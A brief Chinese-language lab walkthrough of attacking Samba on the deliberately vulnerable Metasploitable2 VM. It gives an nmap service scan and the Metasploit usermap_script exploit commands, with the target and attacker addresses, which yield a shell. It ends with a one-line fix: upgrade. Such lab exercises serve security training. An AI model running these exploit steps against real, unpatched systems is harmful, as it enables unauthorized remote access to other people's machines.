kali linux 对Metasploittable2进行samba漏洞利用

实验环境:

攻击机:kali linux 
ip:192.168.172.134
目标机:Metasploittable2
ip:192.168.172.129

攻击过程:

setp1:使用nmap探测samba

nmap -sV -p 139 445 192.168.172.129

setp1:metasploit漏洞利用

启动msf

命令:use exploit/multi/samba/usermap_script

命令:show options

命令:set rhosts 192.168.172.129

命令:set lhost 192.168.172.134

命令:run

获得shell

防御:升级最新版本。

你可能感兴趣的:(kali linux 对Metasploittable2进行samba漏洞利用)